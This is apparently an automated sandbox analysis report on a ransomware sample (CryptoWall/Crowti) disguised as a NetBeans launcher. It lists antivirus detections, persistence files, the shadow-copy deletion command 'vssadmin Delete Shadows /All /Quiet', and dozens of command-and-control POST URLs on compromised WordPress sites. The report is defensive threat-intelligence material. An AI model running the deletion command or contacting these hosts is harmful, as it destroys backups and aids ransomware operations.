Analysis Date2015-10-06 09:33:56
MD589b12afcba6d3919fa2a7d53dedfa36b
SHA12c84c32333e0122a10c9977851372c67721b5ea3

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 3c07a3b3156483890ff2f7dc896ac0fc sha1: 712ddd0276ff6a4c2c6e67153bd5a822a0adaacc size: 144896
Section.data md5: cb9045bdca4920e7005d594ec200a23b sha1: 94e288029a39d27343f29805f68e41bd6c8f1ec9 size: 15872
Section.rsrc md5: 35c50c7d9225943264b8c86f8667ffe9 sha1: 64dc19860ca3315622e8d23db4bb6a27abaefbd9 size: 90624
Timestamp2015-05-27 11:30:37
VersionLegalCopyright: © 2007, 2013 Oracle and/or its affiliates. All rights reserved.
InternalName: nbexec
FileVersion: 7.3.0.0
Full Version: 14012013
CompanyName: Oracle Corporation
ProductName: NetBeans Platform Launcher 7.3
ProductVersion: 7.3.0.0
FileDescription: NetBeans Platform Launcher
OriginalFilename: nbexec.exe
PackerMicrosoft Visual C++ ?.?
PEhash2e21a79752860bbdabbde16de5e5e042d169a8d2
IMPhashcb618f5578007453dd8d7a3c37116a72
AVRisingno_virus
AVMcafeeno_virus
AVAvira (antivir)TR/Dropper.A.39476
AVTwisterno_virus
AVAd-AwareGen:Variant.Symmi.52242
AVAlwil (avast)Sharik-H [Trj]
AVEset (nod32)Win32/Injector.CBUB
AVGrisoft (avg)Win32/Cryptor
AVSymantecno_virus
AVFortinetW32/Kryptik.DTSF!tr
AVBitDefenderGen:Variant.Symmi.52242
AVK7Trojan ( 004c3b711 )
AVMicrosoft Security EssentialsRansom:Win32/Crowti.A
AVMicroWorld (escan)Gen:Variant.Symmi.52242
AVMalwareBytesTrojan.CryptoWall
AVAuthentiumW32/Agent.XL.gen!Eldorado
AVFrisk (f-prot)no_virus
AVIkarusTrojan.Win32.Injector
AVEmsisoftGen:Variant.Symmi.52242
AVZillya!Trojan.Blocker.Win32.28902
AVKasperskyTrojan.Win32.Generic
AVTrend MicroTROJ_CR.AB64B513
AVCAT (quickheal)DownloaderAPT.Drixed.013270
AVVirusBlokAda (vba32)Hoax.Blocker
AVPadvishno_virus
AVBullGuardGen:Variant.Symmi.52242
AVArcabit (arcavir)Gen:Variant.Symmi.52242
AVClamAVno_virus
AVDr. WebTrojan.PWS.Panda.2401
AVF-SecureGen:Variant.Symmi.52242
AVCA (E-Trust Ino)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\6ff06165.exe
Creates FileC:\6ff06165\6ff06165.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\6ff06165.exe
Creates Process-k netsvcs
Creates Processvssadmin.exe Delete Shadows /All /Quiet

Process
↳ -k netsvcs

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Winsock DNSalchemyofpresence.com
Winsock DNStarifair.fr
Winsock DNSblationmedia.com
Winsock DNS3bsgroup.com
Winsock DNSatlantacustomwork.com
Winsock DNSbeijerlandsekelnerrace.nl
Winsock DNSbraingame.biz
Winsock DNSappthere.com
Winsock DNSbezpiecznaswinka.pl
Winsock DNScurlmyip.com
Winsock DNSbebeamor.co.uk
Winsock DNSburoroebers.nl
Winsock DNSbamboo.spb.ru
Winsock DNSautorijschoolconsistent.nl
Winsock DNS7d2.c27.myftpupload.com
Winsock DNSmyexternalip.com
Winsock DNStraditionetgourmandises.fr
Winsock DNSodfgroup.com
Winsock DNSandreiprundeanu.eu
Winsock DNSip-addr.es
Winsock DNSassurancejeuneconducteurpascher.fr
Winsock DNSjandchousecleaning.com
Winsock DNSconvenzioni.ording.roma.it
Winsock DNSasambleadedios.org
Winsock DNSalpha.akesha.com
Winsock DNSsweetthangzdesserts.com
Winsock DNSasadiag.com
Winsock DNSredstarfuochicinesi.it
Winsock DNSuptowndancealbany.com
Winsock DNS4042shopping.com
Winsock DNSgonavarro.com
Winsock DNSbuhtime.by
Winsock DNSdoggonesigns.com
Winsock DNSbrandgriffin.com
Winsock DNSancientvoyages.com
Winsock DNSawynnejoinery.co.uk
Winsock DNShostyoursitehere.com
Winsock DNSjeanrey.fr
Winsock DNSammorgan.net
Winsock DNSamericanfamilyenergy.com
Winsock DNSbshop.com.au
Winsock DNSalsblueshelpt.nl
Winsock DNS99mkb.com
Winsock DNSalebehr.com

Process
↳ vssadmin.exe Delete Shadows /All /Quiet

Creates FilePIPE\lsarpc

Network Details:

DNSip-addr.es
Type: A
188.165.164.184
DNSmyexternalip.com
Type: A
78.47.139.102
DNScurlmyip.com
Type: A
184.106.112.172
DNSalebehr.com
Type: A
81.88.48.113
DNSautorijschoolconsistent.nl
Type: A
91.184.19.41
DNSgonavarro.com
Type: A
23.229.152.35
DNS4042shopping.com
Type: A
184.168.221.33
DNSalchemyofpresence.com
Type: A
184.168.47.225
DNS99mkb.com
Type: A
184.168.174.1
DNSbraingame.biz
Type: A
75.103.83.9
DNShostyoursitehere.com
Type: A
50.62.71.1
DNSsweetthangzdesserts.com
Type: A
160.153.94.8
DNSasadiag.com
Type: A
148.251.140.60
DNSbebeamor.co.uk
Type: A
146.255.46.1
DNSbeijerlandsekelnerrace.nl
Type: A
46.235.40.4
DNSodfgroup.com
Type: A
188.65.114.122
DNSblationmedia.com
Type: A
184.168.47.225
DNSamericanfamilyenergy.com
Type: A
50.62.160.229
DNSatlantacustomwork.com
Type: A
184.168.221.53
DNSancientvoyages.com
Type: A
23.229.143.195
DNSbshop.com.au
Type: A
202.124.241.203
DNSbrandgriffin.com
Type: A
205.144.171.13
DNSawynnejoinery.co.uk
Type: A
104.18.58.244
DNSawynnejoinery.co.uk
Type: A
104.18.59.244
DNSbamboo.spb.ru
Type: A
80.93.62.84
DNStarifair.fr
Type: A
185.26.125.15
DNSandreiprundeanu.eu
Type: A
82.77.75.173
DNS3bsgroup.com
Type: A
50.62.123.1
DNSording.ferreroassociati.com
Type: A
137.117.179.186
DNSalsblueshelpt.nl
Type: A
62.221.204.114
DNS7d2.c27.myftpupload.com
Type: A
184.168.47.225
DNSburoroebers.nl
Type: A
37.128.147.22
DNSjandchousecleaning.com
Type: A
184.168.47.225
DNSbuhtime.by
Type: A
93.125.99.58
DNSjeanrey.fr
Type: A
213.186.33.50
DNSuptowndancealbany.com
Type: A
107.180.1.214
DNSappthere.com
Type: A
141.8.225.244
DNSassurancejeuneconducteurpascher.fr
Type: A
213.186.33.3
DNSdoggonesigns.com
Type: A
127.0.0.1
DNSammorgan.net
Type: A
184.168.47.225
DNSbezpiecznaswinka.pl
Type: A
DNSasambleadedios.org
Type: A
DNStraditionetgourmandises.fr
Type: A
DNSconvenzioni.ording.roma.it
Type: A
DNSalpha.akesha.com
Type: A
DNSredstarfuochicinesi.it
Type: A
HTTP GEThttp://ip-addr.es/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://myexternalip.com/raw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://curlmyip.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://alebehr.com/wp-content/plugins/revslider/temp/update_extract/revslider/img5.php?k=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://autorijschoolconsistent.nl/wp-content/plugins/revslider/temp/update_extract/revslider/img2.php?j=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://gonavarro.com/wp-content/plugins/revslider/temp/update_extract/revslider/img5.php?q=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://4042shopping.com/wp-content/plugins/revslider/temp/update_extract/revslider/img5.php?i=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://alchemyofpresence.com/wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?t=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://99mkb.com/wp-content/plugins/revslider/temp/update_extract/revslider/img3.php?p=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://braingame.biz/wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?x=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hostyoursitehere.com/wp-content/plugins/revslider/temp/update_extract/revslider/img1.php?t=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://sweetthangzdesserts.com/wp-content/plugins/revslider/temp/update_extract/revslider/img1.php?p=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://asadiag.com/wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?l=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://bebeamor.co.uk/wp-content/plugins/revslider/temp/update_extract/revslider/img5.php?h=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://beijerlandsekelnerrace.nl/wp-content/plugins/revslider/temp/update_extract/revslider/img1.php?f=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://odfgroup.com/wp-content/uploads/wpallimport/uploads/eaff1c028b48519b140086082d15f7a3/img4.php?w=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://blationmedia.com/wp-content/plugins/revslider/temp/update_extract/revslider/img3.php?o=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://americanfamilyenergy.com/wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?n=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://atlantacustomwork.com/wp-content/plugins/revslider/temp/update_extract/revslider/img1.php?a=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ancientvoyages.com/wp-content/plugins/revslider/temp/update_extract/revslider/img1.php?a=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://bshop.com.au/wp-content/plugins/revslider/temp/update_extract/revslider/img1.php?t=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://brandgriffin.com/wp-content/plugins/revslider/temp/update_extract/revslider/img5.php?z=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://awynnejoinery.co.uk/wp-content/plugins/revslider/temp/update_extract/revslider/img3.php?a=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://bamboo.spb.ru/wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?o=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://tarifair.fr/wp-content/uploads/wpallimport/uploads/c93320dc393203a3bdc1a987a3bd1ea7/img4.php?r=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://andreiprundeanu.eu/wp-content/plugins/revslider/temp/update_extract/revslider/img2.php?n=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://3bsgroup.com/wp-content/plugins/revslider/temp/update_extract/revslider/img4.php?g=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://convenzioni.ording.roma.it/wp-content/plugins/revslider/temp/update_extract/revslider/img2.php?l=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://alsblueshelpt.nl/wp-content/plugins/revslider/temp/update_extract/revslider/img3.php?e=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://7d2.c27.myftpupload.com/wp-content/plugins/revslider/temp/update_extract/revslider/img1.php?x=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://buroroebers.nl/wp-content/plugins/revslider/temp/update_extract/revslider/img3.php?a=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://jandchousecleaning.com/wp-content/plugins/revslider/temp/update_extract/revslider/img2.php?r=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://buhtime.by/wp-content/plugins/revslider/temp/update_extract/revslider/img2.php?c=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://jeanrey.fr/wp-content/uploads/wpallimport/uploads/3aa8810fe8a85c3aeaf70245feaf0a41/img3.php?i=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://uptowndancealbany.com/wp-content/plugins/revslider/temp/update_extract/revslider/img5.php?u=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://appthere.com/wp-content/plugins/revslider/temp/update_extract/revslider/img3.php?i=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://assurancejeuneconducteurpascher.fr/wp-content/uploads/wpallimport/uploads/6826fa428ee44eea2896299a9cdd1391/img1.php?x=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ammorgan.net/wp-content/plugins/revslider/temp/update_extract/revslider/img5.php?m=govvrox2s6r
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 188.165.164.184:80
Flows TCP192.168.1.1:1032 ➝ 78.47.139.102:80
Flows TCP192.168.1.1:1033 ➝ 184.106.112.172:80
Flows TCP192.168.1.1:1034 ➝ 81.88.48.113:80
Flows TCP192.168.1.1:1035 ➝ 91.184.19.41:80
Flows TCP192.168.1.1:1036 ➝ 23.229.152.35:80
Flows TCP192.168.1.1:1037 ➝ 184.168.221.33:80
Flows TCP192.168.1.1:1038 ➝ 184.168.47.225:80
Flows TCP192.168.1.1:1039 ➝ 184.168.174.1:80
Flows TCP192.168.1.1:1040 ➝ 75.103.83.9:80
Flows TCP192.168.1.1:1041 ➝ 50.62.71.1:80
Flows TCP192.168.1.1:1042 ➝ 160.153.94.8:80
Flows TCP192.168.1.1:1043 ➝ 148.251.140.60:80
Flows TCP192.168.1.1:1044 ➝ 146.255.46.1:80
Flows TCP192.168.1.1:1045 ➝ 46.235.40.4:80
Flows TCP192.168.1.1:1046 ➝ 188.65.114.122:80
Flows TCP192.168.1.1:1047 ➝ 184.168.47.225:80
Flows TCP192.168.1.1:1048 ➝ 50.62.160.229:80
Flows TCP192.168.1.1:1049 ➝ 184.168.221.53:80
Flows TCP192.168.1.1:1050 ➝ 23.229.143.195:80
Flows TCP192.168.1.1:1051 ➝ 202.124.241.203:80
Flows TCP192.168.1.1:1052 ➝ 205.144.171.13:80
Flows TCP192.168.1.1:1053 ➝ 104.18.58.244:80
Flows TCP192.168.1.1:1054 ➝ 80.93.62.84:80
Flows TCP192.168.1.1:1055 ➝ 185.26.125.15:80
Flows TCP192.168.1.1:1056 ➝ 82.77.75.173:80
Flows TCP192.168.1.1:1057 ➝ 50.62.123.1:80
Flows TCP192.168.1.1:1058 ➝ 137.117.179.186:80
Flows TCP192.168.1.1:1059 ➝ 62.221.204.114:80
Flows TCP192.168.1.1:1060 ➝ 184.168.47.225:80
Flows TCP192.168.1.1:1061 ➝ 37.128.147.22:80
Flows TCP192.168.1.1:1062 ➝ 184.168.47.225:80
Flows TCP192.168.1.1:1063 ➝ 93.125.99.58:80
Flows TCP192.168.1.1:1064 ➝ 213.186.33.50:80
Flows TCP192.168.1.1:1065 ➝ 107.180.1.214:80
Flows TCP192.168.1.1:1066 ➝ 141.8.225.244:80
Flows TCP192.168.1.1:1067 ➝ 213.186.33.3:80
Flows TCP192.168.1.1:1069 ➝ 184.168.47.225:80

Raw Pcap

Strings